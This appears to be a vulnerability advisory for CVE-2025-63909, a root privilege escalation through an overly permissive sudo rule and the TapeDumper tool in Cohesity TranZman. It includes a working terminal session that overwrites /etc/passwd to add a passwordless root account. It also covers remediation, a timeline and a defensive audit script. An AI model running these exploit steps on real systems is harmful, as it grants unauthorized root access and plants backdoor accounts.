@GregDurys
Created March 2, 2026 17:29
CVE-2025-63909 - Cohesity TranZman Local Privilege Escalation

CVE-2025-63909: Local Privilege Escalation in Cohesity TranZman

Overview

| Field | Value |
|---|---|
| CVE ID | CVE-2025-63909 |
| CVSS v3.1 | 7.2 (High) |
| Vector | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-269: Improper Privilege Management |
| Vendor | Cohesity, Inc. |
| Product | TranZman Migration Appliance |
| Affected Versions | Release 4.0 Build 14614 including patch TZM_1757588060_SEP2025_FULL.depot |

Description

Incorrect access control in the component /opt/SRLtzm/bin/TapeDumper of Cohesity TranZman Migration Appliance allows attackers to escalate privileges to root and read and write arbitrary files.

The vulnerability exists due to:

  • Overly permissive sudo configuration in /etc/sudoers
  • Admin user has NOPASSWD access to /opt/SRLtzm/bin/*
  • TapeDumper binary treats any file as a tape device, enabling arbitrary file read/write as root

Attack Vector

Prerequisites: Shell access (typically obtained via CLISH command injection - CVE-2025-63911)

TapeDumper is an interactive CLI tool that accepts open and dump commands. It treats arbitrary files as "tape devices", allowing unrestricted read/write operations without validation.

Exploitation steps:

  1. Escape from CLISH using the command injection vulnerability
  2. Create a writable staging file
  3. Launch TapeDumper with sudo, use open to read /etc/passwd and dump to write contents to the staging file
  4. Append a passwordless root user to the staging file
  5. Launch TapeDumper again, open the staging file and dump back to /etc/passwd
  6. Switch to root via su bob

Example session:

[admin@tzm ~]$ touch /tmp/staging
[admin@tzm ~]$ sudo /opt/SRLtzm/bin/TapeDumper
Stone Ram Tape Dumper (862)
open /etc/passwd
dump /tmp/staging
Dumped to '/tmp/staging', size 1859
^C
[admin@tzm ~]$ echo "bob::0:0::/root:/bin/bash" >> /tmp/staging
[admin@tzm ~]$ sudo /opt/SRLtzm/bin/TapeDumper
open /tmp/staging
dump /etc/passwd
Dumped to '/etc/passwd', size 1885
^C
[admin@tzm ~]$ su bob
[root@tzm ~]# id
uid=0(root) gid=0(root) groups=0(root)

Impact

  • Root Access: Complete privilege escalation to root
  • Arbitrary File Access: Read/write any file on the system
  • Persistence: Create backdoor accounts
  • Full System Compromise: Complete control of the TranZman appliance

Remediation

Apply Cohesity patches in the following order:

  1. TZM_patch_1.patch
  2. TZM_1760106063_OCT2025R2_FULL.depot

Contact Cohesity support for the latest OVA version with integrated fixes.

Note: While Cohesity's CLISH fix may reduce exposure by preventing initial shell access, the underlying sudo/TapeDumper vulnerability remains exploitable if alternative shell access is obtained.
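Because the sudo rule and the passwd modification are the two artifacts this advisory describes, both can be checked for on an appliance. The following is an added example, not code from the advisory or from Cohesity: a simplified audit that flags NOPASSWD sudo rules with wildcard commands and passwd entries with UID 0 or an empty password field. The sample inputs are constructed, the function names are hypothetical, and the sudoers parsing ignores aliases, includes and line continuations.

```python
import re

# Constructed sample inputs (not copied from a real appliance).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
admin:x:1000:1000::/home/admin:/bin/bash
bob::0:0::/root:/bin/bash
"""
SAMPLE_SUDOERS = """\
# constructed rule matching the advisory's description
admin ALL=(ALL) NOPASSWD: /opt/SRLtzm/bin/*
backup ALL=(root) /usr/bin/rsync
%wheel ALL=(ALL) ALL
"""

def audit_passwd(text):
    """Return (user, reason) findings for passwd-format text."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if line.startswith("#") or len(fields) != 7:
            continue  # skip comments and malformed entries
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((user, "uid 0 account other than root"))
        if pw == "":
            findings.append((user, "empty password field"))
    return findings

def audit_sudoers(text):
    """Return (who, command) for NOPASSWD rules whose command is ALL or a glob."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"(\S+)\s+.*?NOPASSWD:\s*(.+)$", line)
        if not m:
            continue
        for cmd in (c.strip() for c in m.group(2).split(",")):
            if cmd == "ALL" or any(ch in cmd for ch in "*?["):
                findings.append((m.group(1), cmd))
    return findings

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

On a live system, pass the contents of /etc/passwd and /etc/sudoers (plus any files under /etc/sudoers.d) to the two functions instead of the samples.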

Timeline

| Date | Event |
|---|---|
| 26 September 2025 | Reported to Cohesity |
| 20 October 2025 | Cohesity confirmed fix in patches |
| 25 December 2025 | Embargo period ended |
| 27 December 2025 | Public disclosure |

Credit

Discovered by Greg Durys, LME
